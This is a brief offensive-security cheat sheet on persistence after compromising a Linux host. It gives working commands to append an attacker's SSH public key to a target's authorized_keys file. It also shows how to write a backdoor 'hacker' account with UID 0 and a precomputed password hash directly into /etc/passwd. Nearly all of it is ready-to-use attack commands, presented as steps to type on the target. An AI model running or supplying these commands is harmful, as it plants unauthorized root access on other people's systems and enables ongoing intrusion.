Payload/Loot/Persistence

SSH Key Persistence

Prepare your public key

# Retrieve your public key from private key
PUB=$(ssh-keygen -i -f <(ssh-keygen -e -f ~/.ssh/id_rsa))

# Generate command to type on target
echo -e "echo '$PUB'>>~/.ssh/authorized_keys"

Create ~/.ssh/authorized_keys if it doesn’t exist on target

mkdir ~/.ssh
chmod 700 ~/.ssh
touch ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Add user

echo -n '1337'|openssl passwd -stdin -6
$6$07PkbbZSjiAeltsw$TXFcCHd1VvOg/xOjZHJP6XafpG4MzjKmGQ3smnnIUv7mIgAdlX1eqSuOnU6WbBo8bnM9sWfXvi5kzAMoeaFAy.

cat <<'EOF'>>/etc/passwd
hacker:$6$07PkbbZSjiAeltsw$TXFcCHd1VvOg/xOjZHJP6XafpG4MzjKmGQ3smnnIUv7mIgAdlX1eqSuOnU6WbBo8bnM9sWfXvi5kzAMoeaFAy.:0:0:Hacker Account:/root:/bin/bash
EOF

# Remove
# sed -i '/hacker/d' /etc/passwd